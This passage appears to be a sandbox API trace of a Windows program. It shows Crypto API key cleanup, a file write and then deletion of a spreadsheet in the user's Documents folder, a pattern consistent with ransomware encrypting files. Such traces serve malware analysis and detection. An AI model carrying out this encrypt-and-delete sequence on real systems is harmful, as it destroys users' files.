wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.879] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.879] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.879] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.879] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.879] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.879] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.879] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.879] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.879] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.879] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.879] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.882] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.882] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.882] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.884] WriteFile (in: hFile=0x510, lpBuffer=0x2a8a138*, nNumberOfBytesToWrite=0x8ed8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a138*, lpNumberOfBytesWritten=0x8cf5e4*=0x8ed8, lpOverlapped=0x0) returned 1 [0215.885] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.885] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.885] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0215.885] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.885] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0215.885] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.885] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.885] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.885] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.885] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.885] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.886] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.886] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab9e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0215.886] CryptDestroyKey (hKey=0x9e1c38) returned 1 [0215.886] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.886] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.886] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.886] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.886] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.886] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.886] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.886] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.886] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.886] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.886] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.886] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.886] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.886] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.886] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.886] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.886] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.887] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.887] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.887] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.887] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.887] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.887] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.888] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.888] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.888] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.888] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.888] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.888] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.888] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.888] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.888] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.888] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.888] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.888] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.888] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.889] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.889] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0215.889] CryptReleaseContext (hProv=0xa7c330, dwFlags=0x0) returned 1 [0215.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.889] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.889] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.889] FreeLibrary (hLibModule=0x76390000) returned 1 [0215.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.889] CloseHandle (hObject=0x504) returned 1 [0215.891] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.891] CloseHandle (hObject=0x510) returned 1 [0215.893] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.893] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.893] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.893] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.893] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/iN034yd-ltTggQ-HcC.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\iN034yd-ltTggQ-HcC.xlsx", lpFilePart=0x8cedf4*="iN034yd-ltTggQ-HcC.xlsx") returned 0x31 [0215.893] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\iN034yd-ltTggQ-HcC.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\in034yd-lttggq-hcc.xlsx")) returned 0x20 [0215.893] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\iN034yd-ltTggQ-HcC.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadf7bf00, ftCreationTime.dwHighDateTime=0x1d5b5f4, ftLastAccessTime.dwLowDateTime=0x393cd1c0, ftLastAccessTime.dwHighDateTime=0x1d59f68, ftLastWriteTime.dwLowDateTime=0x393cd1c0, ftLastWriteTime.dwHighDateTime=0x1d59f68, nFileSizeHigh=0x0, nFileSizeLow=0x8ed4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="iN034yd-ltTggQ-HcC.xlsx", cAlternateFileName="IN034Y~1.XLS")) returned 0x9e1eb8 [0215.893] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\iN034yd-ltTggQ-HcC.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\in034yd-lttggq-hcc.xlsx")) returned 1 [0215.896] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadf7bf00, ftCreationTime.dwHighDateTime=0x1d5b5f4, ftLastAccessTime.dwLowDateTime=0x393cd1c0, ftLastAccessTime.dwHighDateTime=0x1d59f68, ftLastWriteTime.dwLowDateTime=0x393cd1c0, ftLastWriteTime.dwHighDateTime=0x1d59f68, nFileSizeHigh=0x0, nFileSizeLow=0x8ed4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="iN034yd-ltTggQ-HcC.xlsx", cAlternateFileName="IN034Y~1.XLS")) returned 0 [0215.896] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0215.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854128 | out: hHeap=0x2af0000) returned 1 [0215.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.897] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0215.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0215.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0215.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0215.898] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafc0 [0215.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0f8 [0215.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0215.898] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0215.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0215.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0215.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0215.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854308 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0215.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0215.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0215.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x64) returned 0x29f7878 [0215.900] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/iN034yd-ltTggQ-HcC.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\iN034yd-ltTggQ-HcC.xlsx", 